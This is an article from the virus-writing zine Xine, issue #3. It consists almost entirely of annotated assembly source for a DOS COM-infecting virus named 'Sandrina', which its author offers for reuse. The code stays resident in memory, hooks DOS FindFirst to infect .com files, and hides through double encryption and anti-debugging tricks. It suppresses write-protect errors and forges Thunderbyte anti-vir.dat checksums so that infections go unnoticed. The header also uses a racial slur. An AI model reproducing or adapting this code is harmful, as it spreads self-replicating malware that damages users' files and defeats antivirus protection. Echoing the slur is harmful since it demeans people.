Copy Link
Add to Bookmark
Report
Xine - issue #3 - Phile 210
/-----------------------------\
| Xine - issue #3 - Phile 210 |
\-----------------------------/
;
; Sandrina : She was really too sexy for me
; ----------
;
; Author : .UnknwoN MnemoniK
;
; Origin : .Belgium
;
; Host : .com non overwritter
; .enun com included
;
; Per Process : .become TSR ( by dos 4A/48/49 )
;
; Hook/res : .int 21h function 4Eh/54h
; .int 24h handler! just for niggas who want spread it!
;
; Note : .This virus is just an exemple virus to use san anti-vir.dat
; hacka engine , you can use it , modify it , pick it all times
; you want. I don't add poly or stealth things because I don't
; find it interresting in this case , a quite simple com
; non-overwritter
;
; Specificty: .Double encrypted + Anti debugging : Int 01h as the decryptor
; yes , Two days ago , I was looking 29A and I saw
; the desassembling of a virus who use this technique
; I decide to test it myself and when an Int 01h are
; executed being traced, no decryption is produced and the code
; crash. His two encryption loop give him a gewd anti-heuristic
; protection
;
; .Force Anti-vir.dat : I looked the bozo tutorial
; and I decide also to code all this routine in one program
; who originally just decrypt this anti-vir.dat , but now
; it's modify all the file and rplace the value of the
; infected as that place . He is quite gewd coding , you can
; use it for yar virii if u want
;
; .Intelligent Interrupt 24 handler , you ever used disk8 ?
; Ok , so lets make a conversation about it , when u put an
; Int24 handler and when the disk is writeprot , there's a dirty
; sound isn't ? Yeah , you see , but now think if ya have like
; each 4E/EF this sound 4 ou 5 times in one dir , this is
; suspect , so now , the virus determine if it's a drive or a
; disk , if it's a floppy , is the disk8 changed from the floppy
; disk since last read ? if yes then put off the Write protected
; internal flag , else then if the write proteced flag activate ,
; skip the infection procedur , now there's a quite gewd
; optimization , I have tested it , no problem , it's work fine!
;
; Warning: a bug was reported , decryptor seems to detected by
; TBAV and the C flag appears , but it comes only with the 2nd
; 3rd infection in the same directory , if you found it , don't
; forget : starzero@hotmail.com
;
.model tiny
.code
.286
org 100h
start:
jmp start0 ; this jump will be reconstruct
; at next generation
start0:
call virus ; Now we call virus for tha delta off.
virus: pop bp ; delta offset ( if you don't
sub bp,offset virus ; understand that , press ctrl-alt-del
; 3 time
;*****************************************************************************
; Part One
;
; i11
; 11 Decryption zone
; 1111
;*****************************************************************************
mov ax,3501h ; Get Int 01 adress
int 21h ; ask dos , dos do it !
; address will be back in es and bx
push es ; save es:bx
push bx
sub ah,10h ; now we have in ax = 2501h
push ax ; save it on stack
lea dx,[bp+encrypt_loop0] ;put in dx offset decrypt loop + delta
int 21h ; move the int 01 handler here !
lea si,[bp+encrypt_begin] ; si = start decryption offset
mov cx,encrypt_end-encrypt_begin
int 01h ; now decrypt it , when it's traced
; the prog crash !
jmp encrypt_begin ; jump
encrypt_loop0: ; but in reality , there is it
db 80h,34h ; alias xor byte ptr [di],xx
key1: db 00
inc si ; increment si
loop encrypt_Loop0 ; make the boucle untill cx=0
iret
encrypt_begin: ; secondary encryption
pop ax ; ax = 2501h
pop dx ; dx = int 01 old offset
pop ds ; ds = int 01 old seg
int 21h ; restore old int 1 seg:off
push cs cs
pop es ds
lea si,[bp+encrypt_begin1] ; second encrypt loop
mov cx,encrypt_end-encrypt_begin1
encrypt_loop2:
mov al,0adh ; anti debugging trick
mov dx,64h ; I remove stack trick
out dx,al ; because it allways crash
db 80h,04h ; alias add byte ptr [si],xx
key2: db 00
mov al,0aeh
mov dx,64h
out dx,al
inc si
loop encrypt_loop2 ; do the loop
;*****************************************************************************
; Part 2 : Put the virus in memory
;
; ýýý22
; x22', 2ø) Put in memory the virus
; 22222
;*****************************************************************************
encrypt_begin1:
MOV di,100h ; push 100h
push di ; return at 100h next boot
LEA si,[bp+save] ;
movsw ; retore original bytes
movsb
mov ax,5469h ; sexy sandrina ;)
int 21h
cmp ax,0666h ; test if we are already in memory
je return
mov ax,3521h ; save 21h adress
int 21h
mov word ptr cs:[bp+Old21S],es ; save here the Int 21 seg
mov word ptr cs:[bp+Old21O],bx ; " " " " " off
push cs ; es = cs
pop es
mov ah,4ah ; modify memory size
push ax
mov bx,0FFFFh ; get max memory
int 21h ; it must return with error and
; how memory is free
sub bx,((real_end-start0)+100h)+1 ; reduce it
pop ax ; modify mem size
int 21h ;
jc return ; if error ? Don't put the virus
mov ah,48h ; allocate memory
mov bx,((real_end-start0)+100h) ; all we need !
int 21h
push ax ; dec ax ( new seg )
dec ax ; to mark and hide this seg to dos
mov es,ax
mov byte ptr es:[0],'Z' ; mask it for dos
mov word ptr es:[1],08
pop es ; es = new seg
xor di,di
push di
pop si
mov cx,100h
push cx
repz movsb ; put the psp
push cs ; ds <- cs
pop ds
lea si,[bp+start]
pop di
mov cx,real_end-start0
repz movsb ; put the code
push ds es ; ds <- es
pop ds
mov ax,2521h
mov dx,offset NewInt_21 ; DS:DX = Int_21_Handler
int 21h ; Set the new handler
pop ds ; ds <- cs
return: push cs ; cs = es = ds
push cs
pop es
pop ds
mov ah,1ah ; restore the dta
mov dx,80h ;
int 21h ; ask dos , dos do it !
; we return here to the host here , look , only a stupid ret!
ret ; remember , push di ( di = 100h )
;**************************************************************************
; Part Three
;
; 33333
; -333 3ø) The Interrupt controller
; 33333
;***************************************************************************
fake_24: mov al,3
mov byte ptr cs:[iswriteprot],1
iret
Old24O: dw 0
Old24S: dw 0
NewInt_21: pushf ; save the flag
cmp ah,4eh ; intercept FindFirst
je Handler21
cmp ax,5469h ; Verify flag infos ( everybody don't
je check_return ; care about it )
popf ; restore it
JmpTO: db 0eah ; jump to the real Int 21h
Old21O: dw 0
Old21S: dw 0
Do_Int21: pushf ; here we make an Int 21h
push cs
call JmpTO
ret
check_return: mov ax,0666h ; return with our verification code
popf
iret
Handler21:
pusha ; save register + seg
push es
push ds
mov ah,2Fh ; save the current dta
int 21h
push es
push bx
push cs ; and set ES = DS = CS
push cs
pop ds
pop es
mov ah,1ah ; fix our dta
lea dx,[dta]
int 21h
call check_conditions ; if we have enough memory for
jc fin0 ; modifing anti-vir.dat ?
mov word ptr [temporary_seg],ax ; if yes , save the temporary seg
mov ax,3524h ; now we hide error handle for user
int 21h ; get adress
mov word ptr cs:[Old24S],es ; and stock it here!
mov word ptr cs:[Old24O],bx
mov ax,2524h ; and now we fix it at our handle
mov dx,offset fake_24 ; everyting is kewl , no more
int 21h ; user aler
mov ah,19h ; get current drive from dos
int 21h
cmp al,1 ; is it <> a or b then put iswriteprot
ja changethings ; off
mov ah,16h ; if a disk8 drive then set if
mov dl,0 ; disk are changed since last times
int 13h ; if so , put iswriteprot off
cmp ah,6 ; is ah = 6 ?
jne don_tchange ; no then don't change anything
changethings:
mov byte ptr [iswriteprot],0 ; put off siwriteprot
don_tchange:
cmp byte ptr [iswriteprot],1 ; if iswriteprot on then skip
je end_of_find ; infection procedure
mov ah,4eh ; Find first (Com)
mov cx,2
lea dx,[com]
next:
Call Do_int21 ; equal Int 21
jc end_of_Find ; FF/FN
call infect
cmp byte ptr [iswriteprot],1 ; is disk protected ?
je end_of_Find ; nah , so continue infections
next0: mov ah,4fh
jmp next
end_of_Find:
mov dx,word ptr cs:[Old24O] ; restore old Int 24 Seg:Off
mov ax,word ptr cs:[Old24S] ; take a look on it !
push ax
pop ds
mov ax,2524h ; restore it
int 21h ; ask dos , dos do it!
push cs
pop ds
call Uncheck ; De-allocate memory
fin0: mov ah,1Ah ; Fix Dta
pop dx
pop ds
int 21h
pop ds ; restore seg+reg
pop es
popa
popf
jmp JmpTo ; return to int 21
go: ; Lseek ( hehehehe )
mov ah,42h
xor cx,cx
xor dx,dx
int 21h
inf_ret0: ret
;********************************************** Add yar infection proc here !
; Part Four
;
; 44 4
; 4444 4ø) Com infection
; 4
;****************************************************************************
infect:
mov ah,byte ptr [dta+22] ; infect only if sec <> 02
and ah,00001111b
xor ah,00000001b
je inf_ret0
mov ax,4301h ; destroy attribute
xor cx,cx
lea dx,[dta+30]
push dx
int 21h
mov ax,3d02h ; open in r/w
int 21h
xchg ax,bx
mov ah,3fh ; save 3 first byte
mov cx,3
lea dx,[save]
int 21h
mov bp,2 ; only for anti-vir if infection Ok
push word ptr [dta+24]
cmp byte ptr [save],'M' ; check if exe
je close
cmp byte ptr [save],'Z' ; check if exe
je close
mov al,0
call go
mov byte ptr [dta+25],0E9h ; make the jump
sub byte ptr [dta+26],3
mov ah,40h ; write it
mov cx,3
lea dx,[dta+25]
int 21h
mov al,2
call go ; go to the end
sub ax,7
mov cx,dx
mov dx,ax
mov ax,4200h ; go to the end -7
int 21h
mov ah,3fh ; read 7 last bytes of the files
mov cx,7
lea dx,[buffer7]
int 21h
add word ptr [buffer7+5],fin-start0 ; add the size of the file
call encrypt_and_write ; write the virus encrypted
dec bp ; bp = 1 ( dec bp , flag Z = 1
; infection OK -> Modify Anti-vir.dat
close:
mov ax,5701h ; fix sec = 02
mov cx,word ptr [dta+22]
and cl,11110000b
inc cl
pop dx
int 21h
mov ah,3eh ; close the file
int 21h
pop dx
mov ax,4301h ; restore attribute
mov cx,word ptr [dta+21]
int 21h
dec bp
jnz Closing_star ; if no infection don't change anti-v.
call antivmodif ; update anti-vir.dat
Closing_star:
ret ; return to tha caller
encrypt_and_write:
push cs ; save cs cs
push cs
mov es,word ptr [temporary_seg] ; copy in temporary_seg the virus
xor di,di
mov si,100h
mov cx,fin-start0+3
repz movsb
mov ah,byte ptr [dta+26] ; encrypt encrypt_end-encrypt_begin1
mov byte ptr es:[key2-100h],ah
lea si,[encrypt_begin1-100h]
mov cx,encrypt_end-encrypt_begin1
enc_loop0:
sub byte ptr es:[si],ah
inc si
loop enc_loop0 ; do the encryption!
mov ah,byte ptr [dta+27] ; encrypt encrypt_end-encrypt_begin
mov byte ptr es:[key1-100h],ah
lea si,[encrypt_begin-100h]
mov cx,encrypt_end-encrypt_begin
enc_loop1:
xor byte ptr es:[si],ah
inc si
loop enc_loop1 ; do the encryption!
mov ah,40h ; write the encrypted virus
mov cx,fin-start0 ; put in cx size
push es
pop ds
lea dx,[start0-100h] ; hehe , we are in meeemory !
int 21h ; !DO IT! Here we gooo!
pop ds
pop es
ret
;*****************************************************************************
; Part five
;
; 5555
; 5555 5ø) Check if condition aivable for modifing Anti-vir.dat
; 55555
;*****************************************************************************
Check_conditions:
mov ah,48h ; can we allocate a seg ?
mov bx,65000/16 ; return with C or not C
int 21h
ret
Uncheck:
mov es,word ptr [temporary_seg] ; delocate the seg who was
mov ah,49h ; allocate upper
int 21h
AM_ret: ret
;****************************************************************************
; Here's the C flag totally out , so , I'm the first to fuck Thunderbyte too
; deep !
;
; 66'
; 6666 6ø) Modifing Anti-vir.dat
; 6666
;*****************************************************************************
AntivModif:
mov ax,4300h ; check if anti-vir.dat
lea dx,[antiv] ; really exist
int 21h
jc AM_ret
mov ax,3D00h ; open anti-vir.dat
mov dx,offset antiv
int 21h
xchg ax,bx
mov word ptr [ncounter],0 ; counters are important , they
mov word ptr [counter],0 ; serve in good part locations
mov ax,4202h ; go on the end
push ax
xor cx,cx
push cx cx cx ; push 3 times 00
pop dx
int 21h
sub ax,80h ; sub entry of high size
loopingzero:
sub ax,40h ; couting
inc byte ptr [ncounter] ; the number of sections
; to scan
cmp ax,0
jnz loopingzero
pop dx cx
pop ax
sub al,2 ; go on the first
int 21h
mov ah,3fh ;read 128 first bytes and store
mov cx,80h+40h ; it into Build0
mov dx,offset build0 ;
int 21h
testfile: ; I was drunk that day...
mov cx,12
lea si,[buildtable] ; get buildtable
lea di,[dta+30] ; here we test the name
loop0: ; here I test if the name of
mov al,byte ptr [si] ; the file is the good one
cmp byte ptr [si],0 ; in the good section
je thatsOK
cmp byte ptr [di],al
jnz notOk
inc si
inc di
loop loop0 ; check every part
notOk: inc byte ptr [counter] ; if all section scanned ?
mov ah,byte ptr [ncounter]
cmp byte ptr [counter],ah
je nohere ; yes ? ok , bye....
mov ah,3Fh
mov cx,40h
mov dx,offset buildtable ; read next section
int 21h
jmp testfile
nohere: mov ah,3eh ; if not in the list , so
int 21h ; close anti-vir.dat
ret ; tchao bella...
thatsOk:
mov ax,word ptr ds:[build0+56h] ; get the decryptor key
mov word ptr ds:[key],ax
lea si,[buildtable+0ch] ; mov si the start of the
; section
mov dx,1ah ; read bozo tutorial
mov cx,word ptr key
xor cx,word ptr ds:[si-0ch]
decryptloop: ; decrypt the zone
mov ch,cl ; mathematical functions
dec cx ; I can't explain it anymore
and cl,0fh ; Wich this way of encryption
mov ax,word ptr ds:[si] ; antivir.dat struct appears
xor ax,cx ; totally out !
rol ax,cl
sub ax,cx
xor ax,word ptr key
mov word ptr ds:[si],ax
inc si
inc si
dec dx
jnz decryptloop ; loop here
mov ah,3eh ; close the file
int 21h
mov ax,3d00h ; open the file in the buildt.
lea dx,[buildtable]
int 21h
xchg ax,bx ; open physically the file
mov ah,3fh ; read 20h first bytes
mov cx,20h
lea dx,[buildtable+0eh]
int 21h
mov al,2 ; go at the end
call go
; now ax = real size of the
; file without modification
; of the dta
mov word ptr [buildtable+0ch],ax ; and save it here
xor ax,ax
call go ; go on the entry of the file
lea si,[start0] ; fix the first bytes of
lea di,[buildtable+30h] ; the entry-point
push cs ; in buildtable
pop es
movsw
movsw
movsw
push ds
push ax dx
mov ah,3fh ; yeah , now , put
mov cx,word ptr [buildtable+0ch] ; all the file in mem
mov ds,word ptr [temporary_seg]
xor dx,dx
int 21h
pop dx ax ;
call calculation ; and render checksums
pop ds
finstore:
mov word ptr [buildtable+2Eh],dx ; save checksums
mov word ptr [buildtable+38h],ax
lea si,[buildtable] ; rendering the Validation
; key
xor ax,ax
mov cx,03eh
pkt_loop: add ax,ax
add al,byte ptr ds:[si]
inc si
do_the_xor: xor ax,0a097h
js do_the_xor
loop pkt_loop
mov word ptr [buildtable+3eh],ax ; put the Validation key
encrypt:
lea si,[buildtable+0ch] ; all is Ok , encrypt the
; section now !
mov dx,1ah
mov cx,word ptr [key]
xor cx,word ptr ds:[si-0ch]
encrypt_loop: mov ch,cl
dec cx
and cl,0fh
mov ax,word ptr ds:[si]
xor ax,word ptr [key]
add ax,cx
ror ax,cl
xor ax,cx
mov word ptr ds:[si],ax
inc si
inc si
dec dx
jnz encrypt_loop ; invert than above
mov ax,3d02h ; Open anti-vir.dat
mov cx,010b
mov dx,offset antiv
int 21h
xchg ax,bx
mov ax,40h ; render position of the section
xor cx,cx
mov cl,byte ptr [counter] ; get number of the section
mul cx ; and multiply it by 40
add ax,80h ; add 80h (128 first bytes)
xchg ax,dx ; we have the right offset now!
xor cx,cx
add ax,40h
mov ax,4200h ; go in it
int 21h
mov ah,40h ; write it
mov cx,40h
mov dx,offset buildtable ; go at buildtable offset
int 21h
mov ah,3eh ; close
int 21h
ret ; return with all is Ok
calculation: ; render checksum
push bx ; this is an important part
mov cx,word ptr [buildtable+0ch] ; if u wanna understand
; go at Bozo tutorial
mov di,cx
shr di,1
xor ax,ax
xor dx,dx
startit: test ah,80h
jz krad1
xor ax,0A097h
krad1: test dh,80h
jz krad2
xor dx,0a097h
krad2: mov bx,ax
add bx,ax
mov cx,dx
add cx,dx
lodsw
mov dl,ah
add ax,bx
mov ah,bh
add dx,cx
mov dh,ch
dec di
jnz startit
pop bx
ret
com: db '*.com',0 ; infos
save: int 20h
db 0
antiv: db 'anti-vir.dat',0
encrypt_end:
buffer7: db 7 dup (0)
fin:
key: dw ?
counter: dw ?
ncounter: dw ?
iswriteprot: dw ?
temporary_seg: dw ?
dta: db 42h dup (?)
build0: db 80h dup (?)
buildtable: db 192-80h-13 dup (?)
real_end:
end start
